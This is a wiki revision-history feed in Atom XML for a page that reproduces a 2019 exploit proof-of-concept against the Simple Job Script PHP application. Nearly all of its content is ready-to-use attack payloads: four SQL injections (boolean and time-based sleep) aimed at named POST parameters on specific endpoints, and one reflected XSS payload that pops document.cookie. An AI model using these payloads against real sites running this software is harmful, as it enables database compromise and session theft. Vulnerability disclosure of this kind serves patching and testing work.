<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=SJS_Simple_Job_Script_SQL%E6%B3%A8%E5%85%A5%26XSS%E6%BC%8F%E6%B4%9E</id>
	<title>SJS Simple Job Script SQL注入&amp;XSS漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=SJS_Simple_Job_Script_SQL%E6%B3%A8%E5%85%A5%26XSS%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=SJS_Simple_Job_Script_SQL%E6%B3%A8%E5%85%A5%26XSS%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-09T04:35:36Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=SJS_Simple_Job_Script_SQL%E6%B3%A8%E5%85%A5%26XSS%E6%BC%8F%E6%B4%9E&amp;diff=2030&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==POC== &lt;pre&gt; # Exploit Title: Simple Job Script - Multiple Vulnerabilities # Date: 26.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://simplejobscript....&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=SJS_Simple_Job_Script_SQL%E6%B3%A8%E5%85%A5%26XSS%E6%BC%8F%E6%B4%9E&amp;diff=2030&amp;oldid=prev"/>
		<updated>2021-05-02T04:55:25Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==POC== &amp;lt;pre&amp;gt; # Exploit Title: Simple Job Script - Multiple Vulnerabilities # Date: 26.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://simplejobscript....&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Simple Job Script - Multiple Vulnerabilities&lt;br /&gt;
# Date: 26.03.2019&lt;br /&gt;
# Exploit Author: Ahmet Ümit BAYRAM&lt;br /&gt;
# Vendor Homepage: https://simplejobscript.com/&lt;br /&gt;
# Download Link:&lt;br /&gt;
https://github.com/niteosoft/simplejobscript/archive/master.zip&lt;br /&gt;
# Demo Site: https://demo.simplejobscript.com&lt;br /&gt;
# Version: Lastest&lt;br /&gt;
# Tested on: Kali Linux&lt;br /&gt;
# CVE: N/A&lt;br /&gt;
&lt;br /&gt;
----- PoC 1: SQLi -----&lt;br /&gt;
&lt;br /&gt;
Request: http://localhost/[PATH]/searched&lt;br /&gt;
Vulnerable Parameter: landing_location (POST)&lt;br /&gt;
Payload:&lt;br /&gt;
landing_location=-1%20OR%203*2*1=6%20AND%20000405=000405%20--%20&amp;amp;landing_title=test&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----- PoC 2: SQLi -----&lt;br /&gt;
&lt;br /&gt;
Request: http://localhost/[PATH]/get_job_applications_ajax.php&lt;br /&gt;
Vulnerable Parameter: job_id (POST)&lt;br /&gt;
Payload: job_id=-1%20OR%203*2*1=6%20AND%20000615=000615%20--%20&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----- PoC 3: SQLi -----&lt;br /&gt;
&lt;br /&gt;
Request: http://localhost/[PATH]/register-recruiters&lt;br /&gt;
Vulnerable Parameter: employerid (POST)&lt;br /&gt;
Payload: if(now()=sysdate(),sleep(0),0)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----- PoC 4: SQLi -----&lt;br /&gt;
&lt;br /&gt;
Request: http://localhost/[PATH]/delete_application_ajax.php&lt;br /&gt;
Vulnerable Parameter: app_id (POST)&lt;br /&gt;
Payload:&lt;br /&gt;
app_id=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'&amp;quot;%2B(select(0)from(select(sleep(0)))v)%2B&amp;quot;*/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----- PoC 5: XSS -----&lt;br /&gt;
&lt;br /&gt;
Request:&lt;br /&gt;
http://localhost/[PATH]/jobs?_=1&amp;amp;job_type_value[]=Full%20time&amp;amp;srch_location_val[]=fulltime_ctype&lt;br /&gt;
Vulnerable Parameter: job_type_value[] (GET)&lt;br /&gt;
Payload: &amp;quot;&amp;gt;&amp;lt;svg+onload%3Dalert(document.cookie)&amp;gt;&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>